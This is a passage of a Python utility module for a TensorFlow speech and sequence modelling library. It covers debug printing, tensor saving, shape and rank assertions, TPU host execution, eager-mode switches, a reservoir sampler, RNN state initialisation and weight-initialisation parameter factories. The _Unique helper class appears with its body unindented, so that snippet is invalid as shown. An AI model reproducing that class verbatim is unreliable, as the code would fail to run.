      # Parse the names inside the `more=[...]` argument from the same line.
      more_vars = re.compile(r'more=\[(.*?)\].*$').search(
          caller.code_context[0]).groups()[0]
      if more_vars:
        caller_more_vars = more_vars.split(',')
  the_class = ''
  if 'self' in stack.f_locals:
    the_class = stack.f_locals['self'].__class__.__name__
  header = '-DBG- {}:{}:{}:{} {} '.format(
      os.path.basename(caller.filename), the_class, caller.function,
      caller.lineno, message)
  # Graph-construction-time log line.
  info = '{}{}={}'.format(header, caller_var, tensor)
  for name, val in zip(caller_more_vars, more):
    info += ' {}={}'.format(name.strip(), val)
  tf.logging.info(info)
  if isinstance(tensor, tf.Tensor):
    # Runtime print: shapes first, then the values, for tensor and `more`.
    tensors = []
    tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
    for name, val in zip(caller_more_vars, more):
      tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
    tensors += [tf.constant('{}='.format(caller_var)), tensor]
    for name, val in zip(caller_more_vars, more):
      tensors += [tf.constant('{}='.format(name.strip())), val]
    name = tensor.name if not tf.executing_eagerly() else '[eager]'
    info = '{}{} {}'.format(header, caller_var, name)
    return tf.identity(
        tf.Print(tensor, tensors, info, summarize=summarize),
        re.sub(':.*$', '', name))
  return tensor
def _Save(steps, prefix, key, val):
  """Saves `val` as '<prefix>.<steps>.<key>.npy' in numpy format (py_func target)."""
  filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
                                 six.ensure_text(key))
  with tf.io.gfile.GFile(filename, 'w') as outfile:
    np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
  """Saves values of tensors into files.

  Useful for debugging. E.g.,

    x = ... a tf.Tensor ...
    y = ... a tf.Tensor ...
    z = compute(x, y)
    z = Save(z, '/path/tmp', x=x, y=y, z=z)

  Args:
    value: A Tensor. Saving happens after this tensor is computed.
    filename_prefix: Every tensor is saved with this filename prefix.
    **kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywards.

  Returns:
    value is returned.
  """
  # Chain control dependencies so files are written in sorted-key order.
  prev = value
  steps = GetGlobalStep()
  for key in sorted(kwargs):
    with tf.control_dependencies([prev]):
      prev = tf.py_func(_Save, [steps, filename_prefix, key, kwargs[key]], [])
  with tf.control_dependencies([prev]):
    return tf.identity(value)
def HasRank(tensor, expected_rank):
  """Syntactic sugar for asserting that tensor has the expected rank."""
  known_rank = tensor.shape.ndims
  if known_rank is not None and isinstance(expected_rank, int):
    # Static check: fail at graph-construction time.
    assert known_rank == expected_rank, (
        'Ranks did not match, got %d, '
        'expected %d') % (known_rank, expected_rank)
    return tensor
  if not py_utils_flags.enable_asserts():
    return tensor
  # Dynamic check: attach a runtime assert.
  return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
                           tensor)
def HasAtLeastRank(tensor, expected_rank):
  """Syntactic sugar for asserting that tensor has rank >= expected_rank."""
  known_rank = tensor.shape.ndims
  if known_rank is not None and isinstance(expected_rank, int):
    # Static check: fail at graph-construction time.
    assert known_rank >= expected_rank, (
        'Rank of tensor %d did not exceed the expected value %d.') % (
            known_rank, expected_rank)
    return tensor
  if not py_utils_flags.enable_asserts():
    return tensor
  # Dynamic check: attach a runtime assert.
  return with_dependencies(
      [tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
      tensor)
def GetRank(tensor):
  """Returns tensor's rank as an int if it's available, otherwise a Tensor.

  Args:
    tensor: The input tensor.

  Returns:
    Either an int or a Tensor for the rank of the input tensor.
  """
  static_rank = tensor.shape.ndims
  return static_rank if static_rank is not None else tf.rank(tensor)
def GetShape(tensor, ndims=None):
  """Returns tensor's shape as a list which can be unpacked, unlike tf.shape.

  Tries to return static shape if it's available. Note that this means
  some of the outputs will be ints while the rest will be Tensors.

  Args:
    tensor: The input tensor.
    ndims: If not None, returns the shapes for the first `ndims` dimensions.

  Returns:
    A 1-D shape Tensor for an unranked tensor, otherwise a list whose entries
    are ints where the static dimension is known and scalar Tensors elsewhere.
  """
  tensor = tf.convert_to_tensor(tensor)
  dynamic_shape = tf.shape(tensor)
  # Early exit for unranked tensor.
  if tensor.shape.ndims is None:
    if ndims is None:
      return dynamic_shape
    else:
      return [dynamic_shape[x] for x in range(ndims)]
  # Ranked tensor.
  if ndims is None:
    ndims = tensor.shape.ndims
  else:
    ndims = min(ndims, tensor.shape.ndims)
  # Return mixture of static and dynamic dims.
  static_shape = tensor.shape.as_list()
  shapes = [
      static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
      for x in range(ndims)
  ]
  return shapes
def HasShape(tensor, expected_shape, ndims=None):
  """Syntactic sugar for asserting that tensor has the expected shape.

  Args:
    tensor: A Tensor.
    expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
      be -1 which indicate that any size is valid for that dimension.
    ndims: If not None, check only the first `ndims` dimensions of `tensor`.
      Must be equal to the length of `expected_shape` if not None.

  Returns:
    The input `tensor` with control dependencies that will raise a runtime
    error if dynamic shape checks fail.

  Raises:
    ValueError: A value error if the assertion fails at static shape checks.
  """
  if not py_utils_flags.enable_asserts():
    return tensor
  # Tag the runtime assert with the caller's file:line(function).
  filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
  msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
                                            filepath), line, func)
  tensor_shape = GetShape(tensor)
  if ndims is not None:
    tensor_shape = tensor_shape[:ndims]
  # TODO(jngiam): Attempt to switch back to tf.Assert after it has better
  # support on GPUs.
  assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
  # If expected_shape is a Tensor, then we are unable to perform static checks.
  # In this case, we can do a dynamic check and return.
  if isinstance(expected_shape, tf.Tensor):
    return with_dependencies([assert_op], tensor)
  # Infer ranks from the inputs.
  expected_rank = len(expected_shape)
  if isinstance(tensor_shape, tf.Tensor):
    tensor_rank = tensor.shape.ndims
  else:
    tensor_rank = len(tensor_shape)
  # If ndims is None, then either one of the ranks should not be None, or they
  # should both match. If both ranks are None, then they are both tensors and
  # should be caught by the earlier short-circuit.
  if ndims is None:
    if (tensor_rank is not None) and (expected_rank != tensor_rank):
      raise ValueError('Tensor does not match rank of expected shape.\n'
                       'Tensor shape: {} Expected shape: {}'.format(
                           tensor_shape, expected_shape))
    # Both tensors can be assumed to be of same rank.
    ndims = expected_rank
  else:
    if (tensor_rank is not None) and (tensor_rank < ndims):
      raise ValueError('Tensor has fewer dimensions than ndims.\n'
                       'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
    if expected_rank != ndims:
      raise ValueError(
          'Expected shape must have number of dimensions equal to ndims.\n'
          'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
  # Ensure that both tensor_shape and expected_shape are both lists.
  tensor_shape = tensor_shape[:ndims]
  if isinstance(tensor_shape, tf.Tensor):
    tensor_shape = tf.unstack(tensor_shape, num=ndims)
  # Map tf.Dimension values to their held values.
  tensor_shape = [
      v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
  ]
  expected_shape = [
      v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
  ]
  # Statically compare every dimension that is known on both sides; fall back
  # to the dynamic assert_op when any dimension is a Tensor.
  all_static_checks = True
  for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
    if isinstance(expected_dim, tf.Tensor):
      all_static_checks = False
    elif expected_dim == -1:
      # -1 matches any size on this dimension.
      continue
    elif isinstance(dim, tf.Tensor):
      all_static_checks = False
    elif dim != expected_dim:
      raise ValueError('Tensor does not match expected shape on dimension {}.\n'
                       'Tensor shape: {} Expected shape: {}'.format(
                           idx, tensor_shape, expected_shape))
  if all_static_checks:
    # Everything verified statically; no runtime dependency needed.
    return tf.convert_to_tensor(tensor)
  else:
    return with_dependencies([assert_op], tensor)
def HasSameShape(x, ref):
  """Syntactic sugar: asserts that `x` has the same shape as `ref`."""
  return HasShape(x, GetShape(ref))
def GetSize(tensor):
  """Returns the total element count: an int when static, else a Tensor."""
  shape = GetShape(tensor)
  fully_static = not isinstance(shape, tf.Tensor) and all(
      not isinstance(dim, tf.Tensor) for dim in shape)
  return np.prod(shape) if fully_static else tf.size(tensor)
def CausalSelfAttenPadding(seqlen, dtype):
  """Returns a [seqlen, seqlen] causal attention padding matrix.

  Entry [i, j] is 1 for future positions (j > i) and 0 elsewhere.
  Wraps tf.linalg.band_part() for tflite compatibility.

  Args:
    seqlen: sequence length (int or scalar Tensor).
    dtype: dtype of the returned matrix.

  Returns:
    A [seqlen, seqlen] tensor of the given dtype.
  """
  if FLAGS.tflite_compatible:
    # band_part is not tflite-compatible; build the mask by comparing
    # row/column indices instead.
    # [N, 1]
    rows = tf.expand_dims(tf.range(seqlen), -1)
    # [1, N]
    cols = tf.expand_dims(tf.range(seqlen), 0)
    row_cols = rows - cols
    # Bug fix: the zeros branch previously hard-coded tf.float32, which
    # mismatched `dtype` (tf.where requires both branches to agree).
    return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
                    tf.zeros([seqlen, seqlen], dtype))
  else:
    return 1.0 - tf.linalg.band_part(
        tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
def outside_all_rewrites():  # pylint: disable=invalid-name
  """Returns a context that clears all control dependencies (graph root)."""
  return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
  r"""Runs the given function call on TPU host.

  Invokes func(\*args, \*\*kwargs) directly if not running on tpu.

  Args:
    func: the function to invoke.
    *args: args of func
    **kwargs: kwargs of func

  Returns:
    The function return value.
  """
  if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
    _OUTSIDE_COMPILATION.on = True
    # try/finally so the thread-local re-entrancy flag is reset even when
    # func raises; previously an exception left it True, disabling
    # outside_compilation for the rest of the thread's lifetime.
    try:
      res = tf.tpu.outside_compilation(func, *args, **kwargs)
    finally:
      _OUTSIDE_COMPILATION.on = False
  else:
    res = func(*args, **kwargs)
  return res
def tpu_host(func):  # pylint: disable=invalid-name
  r"""Decorates a python function to only run on TPU hosts.

  This function has no effect when running on CPU/GPU.

  Example::

      @py_utils.tpu_host
      def ComputeWER(self):
        # Call a custom op computing WER.

  Args:
    func: the function to invoke

  Returns:
    A TPU-host only function
  """

  # functools.wraps preserves func's name/docstring for introspection;
  # the docstring example is also fixed (the decorator takes no arguments).
  @functools.wraps(func)
  def Wrapped(*args, **kwargs):
    return RunOnTpuHost(func, *args, **kwargs)

  return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
  """Records the DeviceAssignment for a TPU job (None = the single TPU job)."""
  if job in _tpu_device_assignment_dict:
    tf.logging.warning('tpu_device_assignment was already set, '
                       'overwriting with new assignment.')
  _tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should be called in unit tests only.
def ClearTpuDevice():
  """Resets all recorded TPU device assignments (test-only helper)."""
  global _tpu_device_assignment_dict
  _tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
  """Returns the DeviceAssignment for `job`; raises KeyError if never set."""
  return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
# If you get an error "tf.enable_eager_execution must be called at program
# startup." but you are calling this function at the start, check if your change
# adds type hints for "tf.data" and wrap those type hints in quotes.
def SetEagerMode(eager_mode=True, test_mode=False):
  """Switch between Eager and Graph mode. Use this instead of TF APIs.

  Args:
    eager_mode: whether to enable (True) or disable (False) eager execution.
    test_mode: when True, only flips the module flag without touching TF's
      global eager state.
  """
  global _IS_EAGER_MODE
  _IS_EAGER_MODE = eager_mode
  # Only change the global flag.
  # Used in tests. In those scenarios we might want to use Graph mode along with
  # Eager mode. All we need is changing the flag `_IS_EAGER_MODE` without
  # calling `enable_eager_execution`/`disable_eager_execution`.
  if test_mode:
    return
  if eager_mode:
    tf.enable_eager_execution()
    tf.config.set_soft_device_placement(True)
  else:
    tf.disable_eager_execution()
def IsEagerMode():
  """Returns the Lingvo-level eager flag (unlike tf.executing_eagerly(), this
  stays True inside a tf.function)."""
  return _IS_EAGER_MODE
# Maintains a tf.GradientTape stack.
_GRADIENT_TAPE_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GradientTape(*args, **kwargs):
  """Creates a tf.GradientTape and use it for automatic differentiation."""
  tape = tf.GradientTape(*args, **kwargs)
  # Publish the tape on a thread-local stack so library code can find the
  # innermost active tape.
  _GRADIENT_TAPE_STACK.stack.append(tape)
  try:
    with tape:
      yield
  finally:
    # Always unwind, even if the body raises.
    _GRADIENT_TAPE_STACK.stack.pop()
def CreateEMAForModel(model_params, global_step):
  """Creates an EMA object for model with param `model_params` if applicable.

  Args:
    model_params: the model's hyperparams (single- or multi-task).
    global_step: the global step tensor, used as EMA num_updates.

  Returns:
    A tf.train.ExponentialMovingAverage when ema_decay > 0, else None.

  Raises:
    ValueError: if a subtask's EMA settings differ from the model's.
  """
  p = model_params

  # Check that EMA settings for the model and subtasks match.
  def CheckEMA(task_name, task_params):
    for field in ['ema_decay', 'ema_decay_moving_vars']:
      model_value = p.train.Get(field)
      task_value = task_params.train.Get(field)
      if task_value != model_value:
        raise ValueError(
            f'Params {field} does not match. Value in model: '
            f'{model_value}, value in task {task_name}: {task_value}')

  if 'task_params' in p:
    # MultiTaskModel. All subtasks should use the same ema settings.
    for task_name, task_params in p.task_params.IterParams():
      CheckEMA(task_name, task_params)
  else:
    assert 'task' in p
    # SingleTaskModel.
    CheckEMA(p.task.name, p.task)
  if p.train.ema_decay > 0:
    return tf.train.ExponentialMovingAverage(
        decay=p.train.ema_decay, num_updates=global_step)
  return None
def SessionConfig(soft_placement=True,
                  inline=True,
                  cluster_def=None,
                  disable_meta_optimizer=False):
  """Returns a session config proto.

  Args:
    soft_placement: Turns allow_soft_placement on iff True.
    inline: Turns do_function_inlining on iff True.
    cluster_def: A tf.train.ClusterDef describing the cluster.
    disable_meta_optimizer: Turns off grappler/metagraph optimizer.

  Returns:
    A TF session config proto.
  """
  session_config = tf.config_pb2.ConfigProto(
      allow_soft_placement=soft_placement,
      graph_options=tf.GraphOptions(
          optimizer_options=tf.OptimizerOptions(
              opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
      cluster_def=cluster_def)
  session_config.share_cluster_devices_in_session = True
  if disable_meta_optimizer:
    # Useful if start-up time is critical.
    session_config.graph_options.rewrite_options.disable_meta_optimizer = True
  # Disable layout optimizer which increases GPU memory usage.
  session_config.graph_options.rewrite_options.layout_optimizer = (
      rewriter_config_pb2.RewriterConfig.OFF)
  return session_config
def AssertIsCompatible(a, b):
  """Asserts `a.IsCompatible(b)` (stripped under python -O, like all asserts)."""
  assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
  """Copies static shapes from src_nmap's tensors onto dst_nmap's tensors."""
  AssertIsCompatible(src_nmap, dst_nmap)
  for src_t, dst_t in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
    dst_t.set_shape(src_t.shape)
def Dtypes(nmap_list):
  """Returns the dtype of every tensor in the flattened structure, in order."""
  return [tensor.dtype for tensor in Flatten(nmap_list)]
def Flatten(x):
  """Flattens 'x' by extracting tensors from nested structures to a list."""
  return tf.nest.flatten(x)
def Pack(tmpl, values):
  """Packs 'values' according to 'tmpl' (inverse of Flatten)."""
  return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
  """Replaces every nested value x in 'v' with fn(x) and returns the result."""
  return tf.nest.map_structure(fn, *v)
def ConvertNoneGradientToZeros(xs, dxs):
  """Sanitize dxs so that None becomes zeros appropriately.

  Args:
    xs: A list of tensors.
    dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.

  Returns:
    A `.NestedMap` same as dxs with None replaced by a zero tensor.
  """

  def _ZeroIfNone(x, dx):
    return tf.zeros_like(x) if dx is None else dx

  return Transform(_ZeroIfNone, xs, dxs)
def IsCompatible(lhs, rhs):
  """Returns true if lhs and rhs have the same nested structure."""
  try:
    tf.nest.assert_same_structure(lhs, rhs)
  except (ValueError, TypeError):
    return False
  return True
class _Unique:
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
  """Returns the flattened `nmap` with duplicates (and Nones) removed."""
  return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
  """Wraps a dict to provide a read-only view of its contents.

  Dict keys can also be accessed by attribute.

  Args:
    backing: Dict-like object to wrap.

  Returns:
    Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
  """

  class Wrapper:
    """Read-only view over `backing`; all access delegates to the closure."""

    # Disable pytype attribute checking.
    _HAS_DYNAMIC_ATTRIBUTES = True

    def __getitem__(self, key):
      return backing[key]

    def __getattr__(self, key):
      return backing[key]

    def __hasattr__(self, key):
      return key in backing

    def __len__(self):
      return len(backing)

    def __iter__(self):
      return iter(backing)

    def __setattr__(self, key, value):
      raise AttributeError('Dictionary is read-only.')

    def __setitem__(self, key, value):
      raise AttributeError('Dictionary is read-only.')

  return Wrapper()
def ToStaticShape(shape):
  """Converts 'shape' to a static shape, resolving Dimensions and symbols."""
  if not isinstance(shape, (list, tuple)):
    # Scalar case: unwrap a lone tf.Dimension, pass anything else through.
    return shape.value if isinstance(shape, tf.Dimension) else shape
  # Unwrap tf.Dimension entries, then resolve symbolic expressions.
  dims = [d.value if isinstance(d, tf.Dimension) else d for d in shape]
  return [
      symbolic.ToStatic(d) if symbolic.IsExpr(d) else d for d in dims
  ]
def Zeros(shape, *args, **kwargs):
  """tf.zeros() that also accepts symbolic/Dimension shapes."""
  return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
  """A reservoir sampler.

  Keeps at most `num_samples` items; every item ever Add()ed has an equal
  chance of being retained.
  See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
  """

  def __init__(self, num_samples):
    assert num_samples > 0
    self._num_samples = num_samples
    self._num_seen_items = 0
    self._samples = []

  def Add(self, item):
    """Add item to sampler."""
    self._num_seen_items += 1
    if len(self._samples) < self._num_samples:
      # Reservoir not yet full: always keep the item.
      self._samples.append(item)
      return
    # Keep the item with probability num_samples / num_seen_items by
    # overwriting a uniformly chosen slot when it lands in range.
    slot = np.random.randint(0, self._num_seen_items)
    if slot < self._num_samples:
      self._samples[slot] = item

  @property
  def samples(self):
    """Fetch the current samples from the sampler."""
    return self._samples
class RNNCellStateInit:
  """State initialization functions for RNN cell init state."""

  @staticmethod
  def _Params(method, seed):
    # Builds a frozen hyperparams object describing the init method.
    p = hyperparams.Params()
    p.Define('method', method,
             'Initialization method. Should be one of zeros, random_normal.')
    p.Define('seed', seed, 'Random seed used to generate initial values.')
    p.Freeze()
    return p

  @staticmethod
  def Zeros():
    """tf.zeros()."""
    return RNNCellStateInit._Params('zeros', seed=None)

  @staticmethod
  def RandomNormal(seed=None):
    """tf.random.normal()."""
    return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
  """Default RNN cell state init: all zeros."""
  return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
  """Initial state definitions for RNN cell implementations.

  Args:
    shape: A array of ints/symbols for specifying the shape of the state.
    init: Hyperparameters as returned by one of the static implemetaitons in
      RNNCellStateInit.
    dtype: The dype of the states. Defaults to tf.float32.
    name: A name for the operation. If --stateless_vars_init is set, this name
      is used to generate a seed on a per-variable basis. Otherwise, this name
      is optional.
    is_eval: Bool, set to True if we need special behavior in eval mode.

  Returns:
    A Tensor of the specified shape, and sampled from the distribution as
    defined by the init parameters.
  """
  shape = ToStaticShape(shape)
  if init is None:
    init = DefaultRNNCellStateInit()
  if dtype is None:
    dtype = tf.float32
  method = init.method
  # In eval mode, random_normal degrades to zeros for determinism.
  if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
    init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
  elif method in ['random_normal']:
    if use_stateless_vars_init():
      if name is None:
        raise ValueError('InitRNNCellState() requires a `name` argument when '
                         '--stateless_vars_init is enabled.')
      # Stateless init: derive a deterministic per-variable seed from `name`.
      seed = _GenerateStatelessRngSeed(name, init.seed)
      init_state = stateless_random_ops.stateless_random_normal(
          shape=shape, dtype=dtype, name=name, seed=seed)
    else:
      init_state = tf.random.normal(
          shape=shape, dtype=dtype, name=name, seed=init.seed)
  else:
    raise ValueError('Initialization method (%s) not supported.' % method)
  return init_state
class WeightInit:
  """Static class providing weight initialization config params.

  Each factory below returns a frozen hyperparams.Params carrying
  (method, scale, seed[, custom_v_init]); the concrete initializer is built
  later from these params (see _CreateVarInitStateful).
  """

  @staticmethod
  def _Params(method, scale, seed, custom_v_init=None):
    """Parameters of this class."""
    p = hyperparams.Params()
    p.Define('method', method, 'Initialization method.')
    p.Define('scale', scale, 'Initialization scale.')
    p.Define('seed', seed, 'Random seed used to generate initial values.')
    p.Define('custom_v_init', custom_v_init,
             'A custom tf.init_ops.Initializer instance.')
    p.Freeze()
    return p

  @staticmethod
  def Gaussian(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1.0)."""
    return WeightInit._Params('gaussian', scale, seed)

  @staticmethod
  def Uniform(scale=1.0, seed=None):
    """scale * tf.random.uniform(-1.0, 1.0)."""
    return WeightInit._Params('uniform', scale, seed)

  @staticmethod
  def UniformPositive(scale=1.0, seed=None):
    """scale * tf.random.uniform(0., 1.0)."""
    return WeightInit._Params('uniform_positive', scale, seed)

  @staticmethod
  def Category(scale=2, seed=None):
    """tf.floor(scale * tf.random.uniform(0., 1.0))."""
    return WeightInit._Params('category', scale, seed)

  @staticmethod
  def Xavier(scale=1.0, seed=None):
    """Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
    return WeightInit._Params('xavier', scale, seed)

  @staticmethod
  def XavierWithFixupParams(scale=1.0,
                            depth=1.0,
                            layers_per_residual_block=1.0,
                            seed=None):
    """Xavier initialization with Fixup."""
    # Fixup rescales Xavier by depth^(-1/(2*m)), m = layers per residual block.
    scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
    return WeightInit._Params('xavier', scale, seed)

  @staticmethod
  def GeoMeanXavier(scale=1.0, seed=None):
    """A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
    return WeightInit._Params('geo_mean_xavier', scale, seed)

  @staticmethod
  def Constant(scale=1.0):
    """scale."""
    # Deterministic; seed is fixed to 0 because it is unused.
    return WeightInit._Params('constant', scale, 0)

  @staticmethod
  def TruncatedGaussian(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1.0)."""
    return WeightInit._Params('truncated_gaussian', scale, seed)

  @staticmethod
  def GaussianSqrtDim(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(dim0))."""
    return WeightInit._Params('gaussian_sqrt_dim', scale, seed)

  @staticmethod
  def GaussianSqrtFanIn(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
    return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)

  @staticmethod
  def GaussianSqrtFanOut(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
    return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)

  @staticmethod
  def GaussianSqrtFanAvg(scale=1.0, seed=None):
    """tf.random.normal(0, sqrt(2.0 / (in + out)))."""
    return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)

  @staticmethod
  def UniformSqrtDim(scale=1.0, seed=None):
    """scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
    return WeightInit._Params('uniform_sqrt_dim', scale, seed)

  @staticmethod
  def UniformUnitScaling(scale=1.0, seed=None):
    """scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
    return WeightInit._Params('uniform_unit_scaling', scale, seed)

  @staticmethod
  def UniformUnitScalingFanAvg(scale=1.0, seed=None):
    """Same as tf.variance_scaling_initializer() ...

    Samples are drawn from a uniform distribution within [-limit, limit], with
    limit = sqrt(3 * scale / n)
    where
    n = max(1., (fan_in + fan_out) / 2).

    See tf.keras.initializers.VarianceScaling for details.

    Args:
      scale: A Python float.
      seed: A Python int or None.

    Returns:
      A WeightInit param.
    """
    return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)

  @staticmethod
  def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
    return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)

  @staticmethod
  def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
    return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)

  @staticmethod
  def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
    return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)

  @staticmethod
  def KaimingUniformFanInRelu(scale=1.0, seed=None):
    """Kaiming uniform initialization with fan-in, for relu activations."""
    return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)

  @staticmethod
  def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
    """Kaiming uniform initialization with fan-in, for leaky-relu activations."""
    return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)

  @staticmethod
  def CustomVarInit(custom_v_init):
    """Initialization via a caller-supplied tf.init_ops.Initializer."""
    return WeightInit._Params('custom', 1.0, None, custom_v_init)

  @staticmethod
  def CustomConstantVarInit(custom_v_init):
    """Like CustomVarInit, but treated as a constant initializer."""
    # 'custom_constant' makes CreateVariable pass shape=None to the creator,
    # since a constant initializer carries its own value/shape.
    return WeightInit._Params('custom_constant', 1.0, None, custom_v_init)

  @staticmethod
  def ScaledDeltaOrthogonal(scale=1.0, seed=None):
    """Delta-orthogonal initialization, scaled by `scale`."""
    return WeightInit._Params('delta_orthogonal', scale, seed)
# Sentinel scale value used to detect that a caller did not explicitly pick an
# initializer; see DefaultParamInit() / IsDefaultParamInit().
_DEFAULT_XAVIER_INIT = 1.000001


def DefaultParamInit():
  """Returns the default weight initializer.

  The sentinel scale 1.000001 acts as a signature that the user picked up the
  default param initializer rather than choosing Xavier explicitly.
  """
  return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)


# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
  """Returns True iff `p` matches the params built by DefaultParamInit()."""
  if p.method != 'xavier' or p.seed is not None:
    return False
  return abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7
def WeightParams(shape,
                 init=None,
                 dtype=None,
                 collections=None,
                 device_mesh=None,
                 tensor_split_dims_mapping=None):
  """Returns a hyperparams for a weight variable given the shape/init/dtype.

  Args:
    shape: The weight shape.
    init: A WeightInit params; defaults to the sentinel Xavier initializer
      (see DefaultParamInit).
    dtype: The weight dtype; defaults to tf.float32.
    collections: Variable collections this weight belongs to; defaults to [].
    device_mesh: Optional np.ndarray device mesh for sharding; see the
      p.Define help text below.
    tensor_split_dims_mapping: Per-dim mesh-axis mapping; required (and
      length-checked against `shape`) when device_mesh is set.

  Returns:
    A hyperparams.Params describing the weight variable.
  """
  if init is None:
    init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
  if dtype is None:
    dtype = tf.float32
  if collections is None:
    collections = []
  if device_mesh is not None:
    # A sharded variable must map every tensor dim to a mesh axis (or -1).
    assert tensor_split_dims_mapping is not None
    assert len(tensor_split_dims_mapping) == len(shape)
  p = hyperparams.Params()
  p.Define('dtype', dtype, 'The weight data type.')
  p.Define('shape', shape, 'The weight shape.')
  p.Define('init', init, 'Initialization method.')
  p.Define('collections', collections,
           'Variable collections this weight belongs to.')
  p.Define(
      'device_mesh', device_mesh,
      'A numpy.ndarray describing the topology of a device mesh to partition'
      ' this variable onto. Each element in the np.ndarray is the ID of a'
      ' device in the topology. device_mesh and tensor_split_dims_mapping below'
      ' together specifies how this weight tensor should be sharded across'
      ' different tpu cores. If None, this variable is not sharded.'
      ' Here are examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) which is a 1d'
      ' mesh with 8 devices, np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) which is'
      ' 2d matrix of 8 devices.')
  p.Define(
      'tensor_split_dims_mapping', tensor_split_dims_mapping,
      'A list of integers that map each tensor axis to the device mesh axis'
      ' along which it is sharded. Its length is the tensor rank, and'
      ' split_dims_mapping[i] is device mesh axis for tensor dimension i. Use'
      ' -1 for tensor dimensions that are not sharded. If the list is set to'
      ' None and a device_mesh is specified, the sharding will be treated as'
      ' replicated. Here is a concrete examples: '
      ' device_mesh=np.array([[0, 1, 2, 3] [4, 5, 6, 7]]), of shape [2, 4]'
      ' shape=[x, y, z], so this is a 3d variable.'
      ' tensor_split_dims_mapping=[-1, -1, 1], in this case, the third dim'
      ' of the variable is split along the second dim of the mesh. Each '
      ' split of the variable is of the shape [x, y, z/4].')
  # The following two flags are used in Jax only.
  p.Define(
      'repeat_prefix', None,
      'If not None, the full shape of this var is repeat_prefix+shape. '
      'For example, if repeat_prefix=[16, 2], and shape=[512, 1024], then '
      'real shape of variable is [16, 2, 512, 1024]. "repeat_prefix" is '
      'often used if a layer is to be used in a recurrent loop, where '
      'logically there are n sub-layers, but for performance/hbm usage '
